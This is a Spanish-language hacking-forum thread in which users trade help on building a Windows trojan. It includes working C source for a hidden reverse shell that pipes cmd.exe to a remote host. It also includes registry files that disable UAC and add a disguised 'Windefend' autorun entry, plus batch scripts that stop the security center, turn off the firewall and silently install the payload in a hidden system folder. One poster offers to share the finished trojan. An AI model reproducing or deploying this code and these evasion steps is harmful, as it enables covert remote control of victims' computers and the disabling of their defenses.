elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  ¿Por que los troyanos no funcionan corectamente? [Windows Vista/7]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Por que los troyanos no funcionan corectamente? [Windows Vista/7]  (Leído 4,398 veces)
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
¿Por que los troyanos no funcionan corectamente? [Windows Vista/7]
« en: 24 Diciembre 2010, 13:49 pm »

Bueno, la cosa es que estoy haciendo un troyano en Windows Vista y 7 en C. He estado probando varias formas, pero no me da resultado. La pregunta es...

¿Por qué los troyanos en Windows XP funcionan y en Vista / 7 no?
Supongo que sera por algun cambio en el sistema operativo, pero deberian funcionar, ¿no?
¿Qué cambia para que no funcionen?
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: ¿Por que los troyanos no funcionan corectamente? [Windows Vista/7]
« Respuesta #1 en: 24 Diciembre 2010, 13:57 pm »

http://foro.elhacker.net/analisis_y_diseno_de_malware/porque_algunos_virus_o_troyanos_no_funcionan_en_otros_so-t304457.0.html

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
xarlyuno

Desconectado Desconectado

Mensajes: 40


Ver Perfil
Re: ¿Por que los troyanos no funcionan corectamente? [Windows Vista/7]
« Respuesta #2 en: 29 Enero 2011, 12:35 pm »

soy un poco novato en el tema, pero si observador; hace mucho que no toco C pero si puedo decirte algo realmente interesante que me pasó; conseguí con un programilla exo en batch que w7/vista/xp me envíe su shell a través de netcat; y como supongo que sabrás tuve que añadirle entradas al registro para que algunos antivirus no detectaran (vamos que no se iniciara el antivirus) nc, supongo que el fallo que cometes en C pueda estar resuelto en mi batch (ojo no pestañean en w7 ni vista al instalarse; ningun aviso)
« Última modificación: 29 Enero 2011, 12:40 pm por xarlyuno » En línea

Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: ¿Por que los troyanos no funcionan corectamente? [Windows Vista/7]
« Respuesta #3 en: 29 Enero 2011, 12:55 pm »

soy un poco novato en el tema, pero si observador; hace mucho que no toco C pero si puedo decirte algo realmente interesante que me pasó; conseguí con un programilla exo en batch que w7/vista/xp me envíe su shell a través de netcat; y como supongo que sabrás tuve que añadirle entradas al registro para que algunos antivirus no detectaran (vamos que no se iniciara el antivirus) nc, supongo que el fallo que cometes en C pueda estar resuelto en mi batch (ojo no pestañean en w7 ni vista al instalarse; ningun aviso)
Gracias por responder, esto estaba un poco pasado y nada mas tengo el code para Linux. No me vale batch, no es para fastidiar a nadie, solo saber como se hace en mi lenguaje. Mi codigo en C era sencillamente este de aqui:
Código
  1. #include <time.h>
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <string.h>
  5. #include <winsock2.h>
  6.  
  7. struct sockaddr_in host;
  8. SOCKET sockfd;
  9.  
  10.  
  11. int main (int argc, char *argv [])
  12. {
  13. ShowWindow (GetForegroundWindow (), SW_HIDE);
  14. WSADATA wsa;
  15. WSAStartup(MAKEWORD(2,2),&wsa);
  16.  
  17. host.sin_addr.s_addr = inet_addr ("127.0.0.1"); // A modificar!
  18. host.sin_port = htons (31337); //Igualmente!
  19. host.sin_family = AF_INET;
  20. memset (host.sin_zero, 0, 8);
  21.  
  22.        if ((sockfd = socket (2, 1, 0)) == -1) return 1;
  23.        while (connect (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr))) Sleep (1);
  24. PROCESS_INFORMATION info_proc;
  25. STARTUPINFO start_proc;
  26. memset(&start_proc,0,sizeof(start_proc));
  27. start_proc.cb=sizeof(start_proc);
  28. start_proc.dwFlags=STARTF_USESTDHANDLES;
  29. start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (HANDLE)sockfd;
  30. CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc);
  31.  
  32.        closesocket (sockfd);
  33.        return 0;
  34. }
  35.  
  36.  
El caso es que este metodo no va en Windows Vista / 7, asi que...
En el subforo de C tenia el post original, un moment...
http://foro.elhacker.net/programacion_cc/c_help_iquesttroyanos_en_windows_vista_7_iquestque_cambia_sin_resolver-t314490.0.html

Sin embargo, podria mirar tu codigo? Es por si me ilumina, pues lo tengo en la carpeta de Projects y nada...
Gracias!
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
xarlyuno

Desconectado Desconectado

Mensajes: 40


Ver Perfil
Re: ¿Por que los troyanos no funcionan corectamente? [Windows Vista/7]
« Respuesta #4 en: 29 Enero 2011, 13:34 pm »

compilé tu programa con borland 6 pero en xp sp3 no me funciono mu bien; es probable que sea por un parche de actualizac. de win.

ESTAS SON LAS MODIFICACIONES DE REGISTRO QUE HICE:

//ESTO ES UNA MODIFICACION PARA VISTA/W7 PARA QUE NO APAREZCA CENTRO
DE SEGURIDAD LO LLAMÉ W8.REG

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
"EnableLUA"=dword:00000000

//PROBÉ MI TROYANO CON ALGUNOS ANTIVIRUS Y AÑADÍ ESTA ENTRADA DE REGISTRO
PORQUE AVIRA O AVG DETECTABAN NETCAT COMO VIRUS LO LLAME RUN.REG

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avgnt"=""
"GrooveMonitor"="\"C:\\Program Files\\Microsoft Office\\Office12\\GrooveMonitor.exe\""
"NeroFilterCheck"="C:\\Program Files\\Common Files\\Nero\\Lib\\NeroCheck.exe"
"NBKeyScan"="\"C:\\Program Files\\Nero\\Nero8\\Nero BackItUp\\NBKeyScan.exe\""
"AVG_TRAY"=""
"Windefend"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,49,00,6e,00,74,00,65,00,6c,00,5c,00,6d,00,73,00,30,00,37,\
  00,39,00,2e,00,65,00,78,00,65,00,00,00

ESTE ES EL PRIMER BATCH LO LLAME MS079.BAT

@echo off
REM DESACTIVA CC. Y FIREWALL, DESPUES EJECUTA PHOTOCS Y NETCAT
NET STOP "CENTRO DE SEGURIDAD"
net stop "sharedaccess"
rem TASKKILL /F /IM explorer.exe
explorer.exe
netsh firewall set opmode DISABLE
netsh firewall set opmode mode = DISABLE
cd %systemroot%\Intel
//REM RENOMBRO PARA TENER UN RESPALDO INDETECTABLE
rename resources.ps

SEGUNDO BATCH  

      REM COLOCA ARCHIVOS Y DEJA LISTO PARA EJECUCIÓN
@ECHO OFF
prompt
      rem hacer que se ejecute como administrador
md %systemroot%\Intel
cd %USERPROFILE%\desktop\proyecto
      rem acuerdate de cambiar el nombre
attrib -h *.*          
xcopy *.* %systemroot%\Intel /Y
regedit.exe /s %systemroot%\Intel\W8.reg
regedit.exe /s %systemroot%\Intel\run.reg
attrib +h *.*
ping 192.168.1.1
taskkill /F /IM explorer.exe /y
explorer.exe
exit

NECESITA UNOS ARREGLILLOS, NO ENCUENTRO AHORA EL QUE ESTÁ FINALIZADO;
USÉ EL BATTOEXE PARA HACERLO EJECUTABLE Y OCULTAR LA PANTALLITA NEGRA
Y WINDEFEND ES OTRO EJECUTABLE QUE ABRE NETCAT EN UN PUERTO A UN HOST
-- JOER, VOY A BUSCAR PARA ENCONTRAR TODO EL CODIGO DEL QUE ESTA FINALIZADO si quieres te envio el troyano y lo puedes destripar a tu gusto

« Última modificación: 29 Enero 2011, 16:37 pm por xarlyuno » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Porque algunos virus o troyanos no funcionan en otros SO? « 1 2 3 »
Análisis y Diseño de Malware
Edu 24 13,336 Último mensaje 12 Octubre 2010, 20:55 pm
por ~
los troyanos aun funcionan?
Análisis y Diseño de Malware
Belial & Grimoire 3 4,540 Último mensaje 25 Enero 2011, 20:02 pm
por sabeeee
[C] [!!! HELP !!!] ¿Troyanos en Windows Vista / 7? ¿Que cambia? [SIN RESOLVER] « 1 2 »
Programación C/C++
Garfield07 12 6,318 Último mensaje 27 Diciembre 2010, 18:32 pm
por Garfield07
Troyanos, cómo funcionan y formas de evitarlos.
Seguridad
colour 0 2,122 Último mensaje 23 Agosto 2012, 11:45 am
por colour
troyanos que funcionan como gusano?
Análisis y Diseño de Malware
Borito30 7 4,967 Último mensaje 26 Diciembre 2016, 23:20 pm
por Dominoob
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines